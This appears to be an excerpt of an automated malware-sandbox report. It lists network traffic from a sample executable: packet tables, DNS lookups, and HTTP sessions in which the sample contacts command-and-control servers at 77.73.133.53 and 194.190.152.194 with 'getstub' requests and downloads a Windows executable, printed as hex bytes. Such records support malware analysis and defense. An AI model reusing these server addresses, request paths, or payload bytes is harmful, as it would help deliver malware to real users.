                                                                                                                                    Oct 10, 2022 06:03:59.789038897 CEST5009864749192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:59.789380074 CEST5009721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:59.814800024 CEST2150097185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:59.814955950 CEST5009721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:59.816132069 CEST5009864749192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:59.841948986 CEST6474950098185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:59.842334032 CEST6474950098185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:59.842431068 CEST5009864749192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:59.842479944 CEST2150097185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:59.845804930 CEST5009721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:59.846420050 CEST5009721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:59.870124102 CEST2150097185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:59.873893023 CEST2150097185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:59.874034882 CEST5009721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:00.018049955 CEST5009921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:00.041866064 CEST2150099185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:04:00.042020082 CEST5009921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:00.069067001 CEST2150099185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:04:00.069117069 CEST2150099185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:04:00.069150925 CEST2150099185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:04:00.069212914 CEST5009921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:00.069212914 CEST5009921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:00.072339058 CEST5009921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:00.096733093 CEST2150099185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:04:00.096863031 CEST5009921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:00.097009897 CEST5009921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:00.121229887 CEST2150099185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:04:00.121400118 CEST5009921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:00.121537924 CEST5009921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:00.146265984 CEST2150099185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:04:00.146373987 CEST5009921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:00.147212982 CEST5009921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:00.172055006 CEST2150099185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:04:00.174511909 CEST5009921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:00.178039074 CEST5009921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:00.205189943 CEST2150099185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:04:00.205355883 CEST5009921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:00.206296921 CEST5009921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:00.230429888 CEST2150099185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:04:00.230516911 CEST5009921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:00.231069088 CEST5010064750192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:00.253732920 CEST6475050100185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:04:00.253861904 CEST5010064750192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:00.254158020 CEST5009921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:00.279001951 CEST2150099185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:04:00.279068947 CEST5009921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:00.279668093 CEST5010064750192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:00.302017927 CEST6475050100185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:04:00.302248955 CEST6475050100185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:04:00.302568913 CEST5010064750192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:00.303189993 CEST2150099185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:04:00.306042910 CEST5009921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:00.307657003 CEST5009921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:00.331383944 CEST2150099185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:04:00.331427097 CEST2150099185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:04:00.331617117 CEST5009921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:00.455965042 CEST5010121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:00.478900909 CEST2150101185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:04:00.479110956 CEST5010121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:00.506329060 CEST2150101185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:04:00.506568909 CEST2150101185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:04:00.506685019 CEST5010121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:00.506830931 CEST2150101185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:04:00.509999037 CEST5010121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:00.510740042 CEST5010121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:00.533427954 CEST2150101185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:04:00.533529997 CEST5010121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:00.533653021 CEST5010121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:00.556642056 CEST2150101185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:04:00.556725979 CEST5010121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:00.556883097 CEST5010121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:00.579621077 CEST2150101185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:04:00.579900980 CEST5010121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:00.580363989 CEST5010121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:00.603432894 CEST2150101185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:04:00.603852987 CEST5010121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:00.604617119 CEST5010121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:00.627298117 CEST2150101185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:04:00.627914906 CEST5010121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:00.636674881 CEST5010121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:00.659693956 CEST2150101185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:04:00.663918972 CEST5010121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:00.664134979 CEST5010264752192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:00.688884974 CEST6475250102185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:04:00.689009905 CEST5010264752192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:00.689316988 CEST5010121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:00.715101004 CEST2150101185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:04:00.715858936 CEST5010121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:00.716336012 CEST5010264752192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:00.739571095 CEST2150101185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:04:00.740281105 CEST6475250102185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:04:00.740504026 CEST5010121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:00.740878105 CEST6475250102185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:04:00.740963936 CEST5010264752192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:00.745671988 CEST5010121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:00.768168926 CEST2150101185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:04:00.768317938 CEST2150101185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:04:00.768459082 CEST5010121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:00.906418085 CEST5010321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:00.931376934 CEST2150103185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:04:00.931540966 CEST5010321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:00.960526943 CEST2150103185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:04:00.960788965 CEST2150103185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:04:00.960827112 CEST2150103185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:04:00.961080074 CEST5010321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:00.961635113 CEST5010321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:00.985811949 CEST2150103185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:04:00.987976074 CEST5010321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:00.990964890 CEST5010321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:01.016140938 CEST2150103185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:04:01.018378019 CEST5010321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:01.018764019 CEST5010321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:01.043174982 CEST2150103185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:04:01.046166897 CEST5010321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:01.046770096 CEST5010321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:01.072282076 CEST2150103185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:04:01.075135946 CEST5010321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:01.075522900 CEST5010321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:01.099437952 CEST2150103185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:04:01.099597931 CEST5010321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:01.100778103 CEST5010321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:01.124942064 CEST2150103185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:04:01.125633001 CEST5010321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:01.125756025 CEST5010464753192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:01.151204109 CEST6475350104185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:04:01.151361942 CEST5010464753192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:01.151654005 CEST5010321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:01.176651001 CEST2150103185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:04:01.176860094 CEST5010321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:01.177783012 CEST5010464753192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:01.203262091 CEST6475350104185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:04:01.213092089 CEST2150103185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:04:01.213232040 CEST5010321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:01.213721037 CEST5010321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:01.214694977 CEST6475350104185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:04:01.214894056 CEST5010464753192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:04:01.237142086 CEST2150103185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:04:01.275204897 CEST2150103185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:04:01.275389910 CEST5010321192.168.2.3185.106.92.60
                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                    Oct 10, 2022 06:02:12.091274023 CEST5439753192.168.2.38.8.8.8
                                                                                                                                    Oct 10, 2022 06:02:12.124773026 CEST53543978.8.8.8192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:13.973756075 CEST5932453192.168.2.38.8.8.8
                                                                                                                                    Oct 10, 2022 06:02:13.992991924 CEST53593248.8.8.8192.168.2.3
                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                    Oct 10, 2022 06:02:12.091274023 CEST192.168.2.38.8.8.80x70d0Standard query (0)github.comA (IP address)IN (0x0001)false
                                                                                                                                    Oct 10, 2022 06:02:13.973756075 CEST192.168.2.38.8.8.80x76e2Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                    Oct 10, 2022 06:02:12.124773026 CEST8.8.8.8192.168.2.30x70d0No error (0)github.com140.82.121.3A (IP address)IN (0x0001)false
                                                                                                                                    Oct 10, 2022 06:02:13.992991924 CEST8.8.8.8192.168.2.30x76e2No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                                    Oct 10, 2022 06:02:13.992991924 CEST8.8.8.8192.168.2.30x76e2No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                                    Oct 10, 2022 06:02:13.992991924 CEST8.8.8.8192.168.2.30x76e2No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                                    Oct 10, 2022 06:02:13.992991924 CEST8.8.8.8192.168.2.30x76e2No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                                    • github.com
                                                                                                                                    • raw.githubusercontent.com
                                                                                                                                    • 77.73.133.53
                                                                                                                                    • 194.190.152.194
                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    0192.168.2.349698140.82.121.3443C:\Program Files (x86)\VzyXoosWayiWtxuQQzUnYrVmOCwvGFaOIttqAjobUgFE\wJpTOIbAbrslKXUFtgsTdnp.exe
                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    1192.168.2.349699185.199.108.133443C:\Program Files (x86)\VzyXoosWayiWtxuQQzUnYrVmOCwvGFaOIttqAjobUgFE\wJpTOIbAbrslKXUFtgsTdnp.exe
                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    2192.168.2.34969177.73.133.5380C:\Users\user\Desktop\EgNIXduB6T.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    Oct 10, 2022 06:01:56.435987949 CEST0OUTGET /cloud/getHost.php?method=getstub&bid=1923830098%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36
                                                                                                                                    Host: 77.73.133.53
                                                                                                                                    Oct 10, 2022 06:01:56.459347963 CEST0INHTTP/1.1 200 OK
                                                                                                                                    Date: Mon, 10 Oct 2022 04:01:56 GMT
                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                    Content-Length: 15
                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Data Raw: 31 39 34 2e 31 39 30 2e 31 35 32 2e 31 39 34
                                                                                                                                    Data Ascii: 194.190.152.194


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    3192.168.2.349692194.190.152.19480C:\Users\user\Desktop\EgNIXduB6T.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    Oct 10, 2022 06:01:56.533441067 CEST2OUTGET /api.php?method=getstub&bid=default%20%20%20%20%20%20%20%20%20&tag=Telegram%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36
                                                                                                                                    Host: 194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.609735012 CEST3INHTTP/1.1 200 OK
                                                                                                                                    Date: Mon, 10 Oct 2022 04:01:56 GMT
                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Data Raw: 32 62 65 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 2d 3b 18 48 69 5a 76 1b 69 5a 76 1b 69 5a 76 1b ba 28 75 1a 7d 5a 76 1b ba 28 73 1a bb 5a 76 1b 09 20 8b 1b 6f 5a 76 1b 09 20 72 1a 78 5a 76 1b 09 20 75 1a 70 5a 76 1b d5 2f 73 1a 42 5a 76 1b d5 2f 72 1a ea 5a 76 1b ba 28 72 1a 70 5a 76 1b 0b 22 73 1a 6b 5a 76 1b 09 20 73 1a 30 5a 76 1b ba 28 77 1a 70 5a 76 1b 69 5a 77 1b 31 5b 76 1b 0d 20 7f 1a 67 5a 76 1b 0d 20 89 1b 68 5a 76 1b 0d 20 74 1a 68 5a 76 1b 52 69 63 68 69 5a 76 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 81 9a 1d 63 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 20 00 20 25 00 00 ec 06 00 00 00 00 00 49 c2 21 00 00 10 00 00 00 30 25 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 2c 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 06 2a 00 04 01 00 00 00 c0 2a 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 2a 00 88 5c 01 00 c0 60 29 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 29 00 18 00 00 00 00 60 29 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 25 00 b4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 52 1e 25 00 00 10 00 00 00 20 25 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 46 ef 04 00 00 30 25 00 00 f0 04 00 00 24 25 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a8 9a 00 00 00 20 2a 00 00 6c 00 00 00 14 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 c0 2a 00 00 02 00 00 00 80 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 88 5c 01 00 00 d0 2a 00 00 5e 01 00 00 82 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 40 21 25 10 e8 98 ae 21 00 59 c3 cc cc cc cc cc cc cc
                                                                                                                                    Data Ascii: 2be000MZ@(!L!This program cannot be run in DOS mode.$-;HiZviZviZv(u}Zv(sZv oZv rxZv upZv/sBZv/rZv(rpZv"skZv s0Zv(wpZviZw1[v gZv hZv thZvRichiZvPELc! %I!0%0,@X***\`)8a)`)@0%.textR% % `.rdataF0%$%@@.data *l*@.rsrc**@@.reloc\*^*@Bh@!%!Y
                                                                                                                                    Oct 10, 2022 06:01:56.609793901 CEST4INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 e4 f0 b8 68 07 01 00 e8 20 b5 21 00 56 57 b9 19 00 00 00 8d bc 24 1b 21 00 00 be a0 15 28 10 33 d2 83 3d e0 a7 2a 10 02 f3 a5 89 54 24 0c 8d 4a 1f 66 a5 a4 8d 72 05 0f 8c 43 01 00 00 0f 28 05 40
                                                                                                                                    Data Ascii: Uh !VW$!(3=*T$JfrC(@_)(%])(_)(5p^))D$fnL$fnffnBfpf((fjfbf8(f8(ff(fff8@fppfpf^)fgfnffn!f
                                                                                                                                    Oct 10, 2022 06:01:56.609834909 CEST6INData Raw: 0f 6a c2 66 0f 38 28 c3 66 0f 38 28 cb 0f c6 c8 dd 66 0f fe ca 66 0f e2 cd 0f 28 c1 66 0f d2 c7 66 0f fe c1 66 0f 38 40 c6 66 0f fa d0 f2 0f 70 c2 d8 f3 0f 70 c0 d8 66 0f 70 c8 d8 66 0f db 0d f0 5e 29 10 66 0f 67 c9 66 0f 6e c1 66 0f fc c8 66 0f
                                                                                                                                    Data Ascii: jf8(f8(ff(fff8@fppfpf^)fgfnffn'^ff~'^pT$s}7=T$T$k:*80#^BT$s|$#^$8$HQ$LAu+$#^QP$@
                                                                                                                                    Oct 10, 2022 06:01:56.609870911 CEST7INData Raw: a5 89 54 24 0c 66 a5 a4 0f 8c 53 01 00 00 0f 28 05 40 5f 29 10 b8 05 00 00 00 0f 28 25 e0 5d 29 10 0f 28 1d c0 5f 29 10 0f 28 35 70 5e 29 10 66 0f 6e e8 b8 1f 00 00 00 0f 29 44 24 10 8b 4c 24 10 66 0f 6e f8 66 0f 6e c2 8d 42 04 66 0f 70 d0 00 66
                                                                                                                                    Data Ascii: T$fS(@_)(%])(_)(5p^)fn)D$L$fnfnBfpf((fjfbf8(f8(ff(fff8@fppfpf^)fgfnffn^ffnfpf~^f((fbfjf8(f8(f
                                                                                                                                    Oct 10, 2022 06:01:56.609910011 CEST8INData Raw: 66 0f db 0d f0 5e 29 10 66 0f 67 c9 66 0f 6e c1 66 0f fc c8 66 0f 6e 84 14 ef 4c 00 00 66 0f ef c8 66 0f 7e 8c 14 ef 4c 00 00 83 c2 08 83 fa 68 0f 8c f5 fe ff ff 89 54 24 0c 83 fa 6f 7d 37 b8 09 cb 3d 8d f7 ea 03 54 24 0c c1 fa 05 8b c2 c1 e8 1f
                                                                                                                                    Data Ascii: f^)fgfnffnLff~LhT$o}7=T$T$k:*80LBT$o|$L$$Q$Au+$LQP$|w3$l=*@'T$K(@_)(
                                                                                                                                    Oct 10, 2022 06:01:56.609946966 CEST10INData Raw: 8b 4c 24 10 66 0f 6e f8 66 0f 6e c2 8d 42 04 66 0f 70 d0 00 66 0f fe d4 0f 28 ca 0f 28 c2 66 0f 6a c2 66 0f 62 ca 66 0f 38 28 c3 66 0f 38 28 cb 0f c6 c8 dd 66 0f fe ca 66 0f e2 cd 0f 28 c1 66 0f d2 c7 66 0f fe c1 66 0f 38 40 c6 66 0f fa d0 f2 0f
                                                                                                                                    Data Ascii: L$fnfnBfpf((fjfbf8(f8(ff(fff8@fppfpf^)fgfnffn?ffnfpf~?f((fbfjf8(f8(ff(fff8@fppfpf^)fgfnff
                                                                                                                                    Oct 10, 2022 06:01:56.609987020 CEST11INData Raw: 24 0c 83 fa 67 7d 3f 0f 1f 84 00 00 00 00 00 b8 09 cb 3d 8d f7 ea 03 54 24 0c c1 fa 05 8b c2 c1 e8 1f 03 c2 8b 54 24 0c 0f be c0 8a ca 6b c0 3a 2a c8 80 c1 38 30 8c 14 50 22 00 00 42 89 54 24 0c 83 fa 67 7c c9 8d 8c 24 50 22 00 00 c7 84 24 28 da
                                                                                                                                    Data Ascii: $g}?=T$T$k:*80P"BT$g|$P"$($8Q$<Au+$P"QP$0m$@<(3=*T$fL(@_)(%])(_)(5p^)fn)D$L$fnfn
                                                                                                                                    Oct 10, 2022 06:01:56.610024929 CEST12INData Raw: cb 0f c6 c8 dd 66 0f fe ca 66 0f e2 cd 0f 28 c1 66 0f d2 c7 66 0f fe c1 66 0f 38 40 c6 66 0f fa d0 f2 0f 70 c2 d8 f3 0f 70 c0 d8 66 0f 70 c8 d8 66 0f db 0d f0 5e 29 10 66 0f 67 c9 66 0f 6e c2 66 0f fc c8 66 0f 6e 84 0c ca 2e 00 00 66 0f ef c8 66
                                                                                                                                    Data Ascii: ff(fff8@fppfpf^)fgfnffn.ffnfpf~.f((fbfjf8(f8(ff(fff8@fppfpf^)fgfnffn.ff~.h:=T$
